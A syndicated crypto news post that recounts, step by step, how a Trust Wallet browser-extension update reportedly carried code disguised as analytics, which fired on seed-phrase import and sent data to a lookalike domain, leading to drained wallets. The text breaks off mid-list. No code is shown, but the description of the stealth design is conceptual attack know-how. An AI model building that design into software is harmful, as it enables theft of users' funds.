The Update That Drained Wallets

The post The Update That Drained Wallets appeared on BitcoinEthereumNews.com.

What Exactly Happened in the Trust Wallet Incident Step 1: A New Browser Extension Update Was Released A new update for the Trust Wallet browser extension was released on December 24. The update seemed routine. No major security warnings came with it. Users installed it through the usual update process. At this point, nothing seemed suspicious. Step 2: New Code Was Added to the Extension After the update, researchers looking into the extension’s files noticed changes in a JavaScript file known as 4482.js. Key observation: This matters because browser wallets are very sensitive environments; any new outgoing logic poses a high risk. Step 3: Code Masqueraded as “Analytics” The added logic appeared as analytics or telemetry code. Specifically: It looked like tracking logic used by common analytics SDKs. It did not trigger all the time. It activated only under certain conditions. This design made it harder to detect during casual testing. Step 4: Trigger Condition — Importing a Seed Phrase Community reverse-engineering suggests the logic was triggered when a user imported a seed phrase into the extension. Why this is critical: Importing a seed phrase gives the wallet full control. This is a one-time, high-value moment. Any malicious code only needs to act once. Users who only used existing wallets may not have triggered this path. Step 5: Wallet Data Was Sent Externally When the trigger condition occurred, the code allegedly sent data to an external endpoint: metrics-trustwallet[.]com What raised alarms: The domain looked a lot like a legitimate Trust Wallet subdomain. It was registered only days earlier. It was not publicly documented. It later went offline. At least, this confirms unexpected outgoing communication from the wallet extension. Step 6: Attackers Acted Immediately Shortly after seed phrase imports, users reported: Wallets drained within minutes. Multiple assets moved quickly. No further…

Leave a Reply

Your email address will not be published. Required fields are marked *

Filed under: News - @ December 25, 2025 11:20 pm